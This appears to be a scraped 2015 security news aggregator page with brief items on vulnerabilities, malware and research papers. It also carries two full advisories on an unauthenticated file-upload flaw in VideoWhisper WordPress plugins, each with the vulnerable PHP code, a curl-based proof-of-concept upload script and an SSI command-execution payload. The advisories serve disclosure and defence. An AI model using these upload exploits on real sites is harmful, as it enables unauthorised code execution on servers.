Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Encryption Companies Throwing Shade Keeps Everyone In the Dark

March 31, 2015, 4:43 pm
$
0
0
In the burgeoning market for services that keep your messages safe from hackers and the NSA, every new app wants to be seen as more secure than the last—even if they’re really not.

In the last two weeks alone, industry players both new and established in the world of secure messaging apps have made incredible claims about the security of their services compared to their competitors’. Every one of them has been picked apart by third party experts, leading some in the encryption community to wonder if the companies in question are more interested in increasing their market share than protecting their users.

more here...........http://motherboard.vice.com/read/encryption-companies-throwing-shade-keeps-everyone-in-the-dark
Search

Exploiting the Airties Air Series PoC

March 31, 2015, 4:54 pm

The month of the RAT in Google Play

March 31, 2015, 5:01 pm
$
0
0
A few days ago, Lukas Stefanko from ESET discovered a new remote administration system RAT for Android. Although there are some known RATs for Android, this malware had something special. It used Baidu Cloud Push notifications for sending commands to the victims. What we can confirm (not in the original blog entry), is that this RAT has been available not only in "alternative markets", but in Google Play, undetected for more than a month.

more here..........http://blog.elevenpaths.com/2015/03/the-month-of-rat-in-google-play.html

mimikatz 2.0 alpha 20150401 (oe.eo) edition release

March 31, 2015, 5:57 pm

Critical vulnerabilities in JSON Web Token libraries

April 1, 2015, 12:26 am
$
0
0
tl;dr If you are using node-jsonwebtoken or pyjwt with asymmetric keys (RS256, RS384, RS512, ES256, ES384, ES512) please update to the latest version. If you are using php-jwt or jsjwt with asymmetric keys consider using other non-vulnerable libraries until they are patched or verified. See jwt.io for more information on the vulnerable libraries.

Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities.

more here...........https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/

ropc v2.0

April 1, 2015, 12:33 am

Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17

April 1, 2015, 12:57 am
$
0
0 
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site 
"VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, 
interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more 
on WordPress Video Presentation plugin home page."

Vulnerability:
From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows various remote unauthenticated file 
uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which 
types are allowed. Because of this .shtml can be passed through and remote code execution if SSI is allowed. The code 
does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress 
site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps 
The 
if (strstr($filename,'.php')) exit; 

can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml
<?php 
if ($_GET["room"]) $room=$_GET["room"]; 
if ($_POST["room"]) $room=$_POST["room"]; 
$filename=$_FILES['vw_file']['name']; 
include_once("incsan.php"); 
sanV($room); 
if (!$room) exit; 
sanV($filename);
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit; 
if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 
$destination="uploads/".$room."/“; 
if ($_GET["slides"]) $destination .= "slides/“; 
$ext=strtolower(substr($filename,-4)); 
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps”);
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 
?>loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
        videowhis_poc.php 
<?php

         $uploadfile="upexp.shtml";
         $ch = 
         curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php";);
         curl_setopt($ch, CURLOPT_POST, true);
         curl_setopt($ch, CURLOPT_POSTFIELDS,
                  array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
         $postResult = curl_exec($ch);
         curl_close($ch);
         print "$postResult";

         ?>


         upexp.shtml

<html>

<!--#exec cmd="/usr/bin/date > /tmp/p" -->

         this is html
</html>


         The executeable should be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads

Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

April 1, 2015, 12:57 am
$
0
0 
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix. http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web based multiple way video chat and real time 
file sharing tool.  Read more on WordPress Video Conference plugin home page."

Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php Allows various remote unauthenticated file uploads, among 
the file types is html where the last 4 characters are only being checked in a file name to match which types are 
allowed. Because of this .shtml can be passed through and remote code execution is SSI is allowed. The code does not do 
any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: 

.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps The
if (strstr($filename,'.php')) exit;
can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml

./videowhisper-video-conference-integration/vc/vw_upload.php

<?php 
if ($_GET["room"]) $room=$_GET["room"]; 
if ($_POST["room"]) $room=$_POST["room"]; 

$filename=$_FILES['vw_file']['name’];
include_once("incsan.php"); 
sanV($room);
if (!$room) exit; 
sanV($filename); 
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit; 
if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 
$destination="uploads/".$room."/“; 
if ($_GET["slides"]) $destination .= "slides/“;
$ext=strtolower(substr($filename,-4)); 
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps”);
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

CVEID: TBD
OSVDB: TBD

Exploit Code:
         videowhisp_poc.php 

<?php

         $uploadfile="upexp.shtml";
         $ch = 
         curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php";);
       curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS,
                   array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
         $postResult = curl_exec($ch);
         curl_close($ch);
         print "$postResult";

         ?>

         upexp.shtml

<html>

<!--#exec cmd="/usr/bin/date > /tmp/p" -->

         this is html
</html>


         The executeable should be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
Search

Interesting XML Processing in Copy/Paste in Word and Outlook

April 1, 2015, 2:12 am

Advanced PDF Tricks (Video From TROOPERS15 Conference Included)

April 1, 2015, 3:01 am
$
0
0
This repository (for now) is development home to some hand-crafted PDF files. These PDFs should serve as study material for everybody who wants to learn about this format.

more here..........https://github.com/angea/PDF101

EvilAP_Defender

April 1, 2015, 3:48 am
$
0
0
The tool basically helps wireless administrators to protect their networks from Evil APs (Evil Twin and any other similar attack including Infernal Wireless Attack). It can discover Evil APs which have the same SSIDs as legitimate network. Then it can alert the admin through email (SMS may be supported later on)‎. Additionally, it can perform DoS on the discovered Evil APs to protect users from connecting to it as well as giving the administrator some time to react. The tool can be configured easily using wizards during a mode called learning mode. Currently, the tool has several features: - Discover Evil APs with different BSSID - Discover Evil APs with fake BSSID but different attributes including: channel, Cipher, privacy, authentication - Discover Evil APs with fake BSSID and all above attributes but different Tagged Parameters (Currently no software based AP support changing tagged parameters) - Learning mode: help in configuring the tool (auto-config, add/remove specific AP to/from whitelist, clear whitelist, change options) - Admin notification - Prevention mode: attack Evil APs - And much more

Additional info here......https://github.com/moha99sa/EvilAP_Defender

Rig Exploit Kit Changes Traffic Patterns

April 1, 2015, 3:55 am

Paper: Optical Delusions: A Study of Malicious QR Codes in the Wild

April 1, 2015, 4:00 am
$
0
0
Abstract—QR codes, a form of 2D barcode, allow easy interaction
between mobile devices and websites or printed material
by removing the burden of manually typing a URL or contact
information. QR codes are increasingly popular and are likely
to be adopted by malware authors and cyber-criminals as well.
In fact, while a link can “look” suspicious, malicious and benign
QR codes cannot be distinguished by simply looking at them.
However, despite public discussions about increasing use of QR
codes for malicious purposes, the prevalence of malicious QR
codes and the kinds of threats they pose are still unclear.
In this paper, we examine attacks on the Internet that rely
on QR codes. Using a crawler, we performed a large-scale
experiment by analyzing QR codes across 14 million unique web
pages over a ten-month period. Our results show that QR code
technology is already used by attackers, for example to distribute
malware or to lead users to phishing sites. However, the relatively
few malicious QR codes we found in our experiments suggest that,
on a global scale, the frequency of these attacks is not alarmingly
high and users are rarely exposed to the threats distributed via
QR codes while surfing the web.

Paper: Opaque Control-Flow Integrity

April 1, 2015, 4:03 am
$
0
0
Abstract—A new binary software randomization and ControlFlow
Integrity (CFI) enforcement system is presented, which
is the first to efficiently resist code-reuse attacks launched by
informed adversaries who possess full knowledge of the inmemory
code layout of victim programs. The defense mitigates a
recent wave of implementation disclosure attacks, by which adversaries
can exfiltrate in-memory code details in order to prepare
code-reuse attacks (e.g., Return-Oriented Programming (ROP)
attacks) that bypass fine-grained randomization defenses. Such
implementation-aware attacks defeat traditional fine-grained randomization
by undermining its assumption that the randomized
locations of abusable code gadgets remain secret.
Opaque CFI (O-CFI) overcomes this weakness through a
novel combination of fine-grained code-randomization and coarsegrained
control-flow integrity checking. It conceals the graph of
hijackable control-flow edges even from attackers who can view
the complete stack, heap, and binary code of the victim process.
For maximal efficiency, the integrity checks are implemented
using instructions that will soon be hardware-accelerated on
commodity x86-x64 processors. The approach is highly practical
since it does not require a modified compiler and can protect
legacy binaries without access to source code. Experiments using
our fully functional prototype implementation show that O-CFI
provides significant probabilistic protection against ROP attacks
launched by adversaries with complete code layout knowledge,
and exhibits only 4.7% mean performance overhead on current
hardware (with further overhead reductions to follow on forthcoming
Intel processors).

more here...........http://www.utdallas.edu/~hamlen/mohan15ndss.pdf

Exploit for CVE-2014-6271, Bash "ShellShock" Remote Code Execution

April 1, 2015, 6:19 am
$
0
0
This is an exploit for the well known "ShellShock" vulnerability in BASH, specifically, targetting CGI scripts. You can see this code is recycled in the MoovMisManage exploit. The interesting/fun bit about this exploit is the dynamic ELF generation I borrowed from bl4sty's Nagios exploit, as it saves me messing about with reverse shell scripts - I just upload and run a simple ELF binary on the box. For what its worth, I had not planned on releasing this to the general public until the PTY shellcode was done, but it got out when I gave it to a few people, so no point keeping it to myself anymore.

more here.......https://github.com/XiphosResearch/exploits/tree/master/shellshock
Search

CRIMEWARE-AS-A-SERVICE CAROUSEL

April 1, 2015, 6:23 am
$
0
0
Invincea reviews thousands of security events per day from the more than one million Dell commercial endpoints running our software around the world.  Invincea prevents hundreds of infections per day- from weaponized phishing documents, to directed malvertising, to run-of-the-mill banking botnets.  The infection event information presented below seemed to be one of those common botnet infection attempts.

read more here.....http://www.invincea.com/2015/04/crimeware-as-a-service-carousel/

CARISIRT: Request for Logs

April 1, 2015, 7:22 am
$
0
0
Over the past couple weeks, we have been tracking a possible re-emergence of a threat group originating from China: CZT. The security team here at CARI.net has done extensive research on this threat and is continuing to work with leading security companies as well as government agencies to verify, track and hopefully put an end to this new threat.

Starting in mid-November, there has been batches of requests that resemble the following......http://blog.cari.net/carisirt-request-for-logs/

notepad++ website hacked (inclusive Boy George's "Karma Chameleon" Song)?

April 1, 2015, 12:04 pm

CVE-2015-0225: Apache Cassandra remote execution of arbitrary code

April 1, 2015, 10:03 am
$
0
0 
CVE-2015-0225: Apache Cassandra remote execution of arbitrary code

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Cassandra 1.2.0 to 1.2.19
Cassandra 2.0.0 to 2.0.13
Cassandra 2.1.0 to 2.1.3

Description:
Under its default configuration, Cassandra binds an unauthenticated
JMX/RMI interface to all network interfaces.  As RMI is an API for the
transport and remote execution of serialized Java, anyone with access
to this interface can execute arbitrary code as the running user.

Mitigation:
1.2.x has reached EOL, so users of <= 1.2.x are recommended to upgrade
to a supported version of Cassandra, or manually configure encryption
and authentication of JMX,
(seehttps://wiki.apache.org/cassandra/JmxSecurity).
2.0.x users should upgrade to 2.0.14
2.1.x users should upgrade to 2.1.4
Alternately, users of any version not wishing to upgrade can
reconfigure JMX/RMI to enable encryption and authentication according
to https://wiki.apache.org/cassandra/JmxSecurityor
http://docs.oracle.com/javase/7/docs/technotes/guides/management/agent.html

Credit:
This issue was discovered by Georgi Geshev of MWR InfoSecurity

“Fancybox for WordPress Has Expired” Infection

April 1, 2015, 2:32 pm
$
0
0
Today I began to notice quite a massive and very unusual attack that leverages vulnerabilities in older versions of the FancyBox for WordPress plugin.


As you might know, versions 3.0.2 and older of this plugin allowed anyone to craft special POST requests to /wp-admin/admin-post.php or /wp-admin/admin-ajax.php and change values of specific plugin options in WordPress database. The plugin uses the modified options to build its own JavaScript code. As a result, the malicious content gets injected into generated WordPress pages.

A typical malicious injection looks like this http://blog.unmaskparasites.com/2015/04/01/fancybox-for-wordpress-has-expired-infection/
Viewing all 8064 articles
Browse latest View live
Search